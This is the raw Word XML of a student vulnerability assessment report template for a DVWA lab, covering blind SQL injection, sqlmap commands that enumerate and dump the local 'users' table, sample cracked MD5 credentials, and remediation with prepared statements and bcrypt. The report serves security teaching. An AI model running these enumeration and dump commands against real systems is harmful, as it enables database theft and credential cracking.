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2D6A9F"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY ASSESSMENT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Web Application Security Lab Exercise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 Title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Blind SQL Injection with Full Database Enumeration via SQLMap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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity / CVSS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  —  8.8  (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Type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CWE-89 - SQL Injection (Blind, Boolean-Based) + Weak Password Hashing (MD5)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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint Affected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http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit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[Your Full Name]  |  [Student ID]  |  [Course Name / Code]  |  March 13, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="180" w:after="8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1.  Vulnerability Description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 Blind SQL Injection vulnerability was identified in the DVWA user lookup parameter. Unlike classic SQLi, no data is returned directly in the page - instead the application's boolean true/false response leaks database information indirectly. An initial attempt using classic SQLi authentication bypass payloads was unsuccessful. The Blind SQLi vector was then confirmed manually by submitting ID=1, which returned a positive user-exists response, while an invalid ID returned nothing. This boolean behavior confirmed user input was being embedded unsanitized into a back-end SQL query.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The back-end code follows a pattern similar to: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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// VULNERABLE - user input concatenated directly into query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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// $id sourced from $_GET['id'] with no sanitization or parameterization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="180" w:after="8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2.  Evidence of Exploitation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Phase 1 — Blind SQLi Confirmed (Boolean Response)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Entering ID=1 returned a user-exists confirmation; an invalid ID returned no output. This true/false behavior confirmed the injectable parameter.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[ SCREENSHOT: BLIND SQLI BOOLEAN RESPONSE — ID=1 ]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Show the browser response confirming user exists for ID=1. Annotate the URL parameter and the response message on screen.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="10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Fig. 1 — Boolean response to ID=1 confirms the Blind SQL Injection vector.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Phase 2 — Database Enumeration (SQLMap --dbs)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SQLMap was launched against the confirmed parameter with the active session cookie. Two databases were returned: information_schema (MySQL system) and dvwa (target of interest).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sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"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       --cookie="PHPSESSID=&lt;session_id&gt;; security=low" --dbs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Discovered: [*] dvwa    [*] information_schema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[ SCREENSHOT: SQLMAP --DBS OUTPUT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Show the SQLMap terminal output listing both discovered databases. Highlight or annotate the 'dvwa' entry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="10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Fig. 2 — SQLMap enumerates two databases; dvwa identified as the target.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Phase 3 — Table, Column &amp; Credential Dump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Further enumeration of the dvwa database revealed a users table. Column dumping identified user_id and password as columns of interest. SQLMap dumped all records and automatically cracked the stored MD5 hashes, returning plaintext credentials for all five accounts.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sqlmap ... -D dvwa --tables          # found: users, guestbook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sqlmap ... -D dvwa -T users --columns  # found: user_id, user,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sqlmap ... -D dvwa -T users --dump     # cracked MD5 hashes automatically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9FB5"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Sample output (replace with your actual results):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AAAAA"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">user_id | user    | password hash (MD5)              | plaintext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1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 |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2       | gordonb | e99a18c428cb38d5f260853678922e03 | abc123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3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | charley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4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | letmein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5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | password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[ SCREENSHOT: SQLMAP TABLE/COLUMN DUMP + CRACKED CREDENTIALS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Show the full SQLMap dump output with user_id, username, MD5 hash, and cracked plaintext columns visible. Annotate the cracked password column.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="10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Fig. 3 — All five user accounts extracted; MD5 hashes cracked to plaintext by SQLMap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="180" w:after="8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3. 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Complete credential exposure — all five accounts extracted with plaintext passwords recovered from cracked MD5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Authentication bypass — attacker can now log in as any user including admin with recovered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Credential stuffing risk — users who reuse passwords across other platforms are at immediate further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Data integrity — the same injection vector permits INSERT, UPDATE, and DELETE operations against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Weak hashing amplified damage — unsalted MD5 allowed all hashes to be cracked near-instantly, compounding the breach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 a real environment this would constitute a reportable data breach under GDPR Article 33 and PCI-DSS Requirement 6, requiring user notification and regulatory disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="180" w:after="8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4.  Remediation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Primary Fix — Parameterized Queries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Replace all dynamic SQL string concatenation with prepared statements. This eliminates both classic and blind injection by ensuring input is always treated as data, never executable SQL.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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// INSECURE (current)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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$query = "SELECT ... WHERE user_id = '$id';";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// SECURE - PDO Prepared Statement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$stmt = $pdo-&gt;prepare("SELECT first_name, last_name FROM users WHERE user_id = ?");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$stmt-&gt;execute([$id]);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pP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Secondary Fix — Replace MD5 with bcrypt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MD5 is not a password hashing function - it is too fast and unsalted, making it trivially crackable. All passwords must be migrated to bcrypt or Argon2id.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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// INSECURE (current)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8C8C"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$hash = md5($password);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// SECURE - bcrypt (PHP built-in, auto-salted)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$hash = password_hash($password, PASSWORD_BCRYPT);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if (password_verify($input, $storedHash)) { /* success */ }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pP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1A4A7A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional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Guidance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Validate that id accepts only positive integers; reject all non-numeric input server-side before it reaches the database.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Throttle requests to the vulnerable endpoint - SQLMap relies on thousands of rapid requests and is severely hindered by rate limiting.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Least-Privilege DB User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application DB account should have only SELECT / INSERT / UPDATE on required tables - no DROP, FILE, or schema-level privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="280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Suppress DB Errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D6A9F" w:sz="4"/>
              <w:left w:val="single" w:color="2D6A9F" w:sz="4"/>
              <w:bottom w:val="single" w:color="2D6A9F" w:sz="4"/>
              <w:right w:val="single" w:color="2D6A9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Never expose raw database error messages to users - generic error pages prevent information disclosure that aids injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="180" w:after="8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OWASP. (2021). A03:2021 - Injection. https://owasp.org/Top10/A03_2021-Injection/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OWASP. (2023). SQL Injection Prevention Cheat Sheet. https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html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PortSwigger. (2024). Blind SQL Injection. https://portswigger.net/web-security/sql-injection/blind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SQLMap Project. (2024). Automatic SQL Injection Tool. https://sqlmap.org/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PHP Manual. (2024). password_hash(). https://www.php.net/manual/en/function.password-hash.php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FIRST. (2019). CVSS v3.1 Specification. https://www.first.org/cvss/specification-document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="10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Academic Integrity Declaration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I confirm this report was completed as part of a controlled academic lab exercise. All exploitation was performed exclusively within the designated lab environment. No real-world systems were targeted.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Student Name: ___________________________    Signature: ___________________________    Date: March 13, 2026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CCCCCC" w:sz="4" w:space="1"/>
            <w:left w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="nil" w:color="FFFFFF" w:sz="0"/>
          </w:tcBorders>
          <w:tcMar>
            <w:top w:type="dxa" w:w="60"/>
          </w:tcMar>
        </w:tcPr>
        <w:p>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
              <w:color w:val="888888"/>
              <w:sz w:val="15"/>
              <w:szCs w:val="15"/>
            </w:rPr>
            <w:t xml:space="preserve">Web Application Security Assessment  |  DVWA Lab</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="5040"/>
          <w:tcBorders>
            <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
            <w:left w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:right w:val="nil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5"/>
              <w:szCs w:val="15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5"/>
              <w:szCs w:val="15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il" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
            <w:right w:val="nil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2D6A9F"/>
              <w:sz w:val="17"/>
              <w:szCs w:val="17"/>
            </w:rPr>
            <w:t xml:space="preserve">VULNERABILITY ASSESSMENT REPORT</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:type="dxa" w:w="3000"/>
          <w:tcBorders>
            <w:top w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:left w:val="nil" w:color="FFFFFF" w:sz="0"/>
            <w:bottom w:val="single" w:color="2D6A9F" w:sz="6" w:space="1"/>
            <w:right w:val="nil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C0000"/>
              <w:sz w:val="17"/>
              <w:szCs w:val="17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80" w:after="80"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2D6A9F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20" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A4A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2026-03-13T23:18:44.610Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-13T23:18:44.611Z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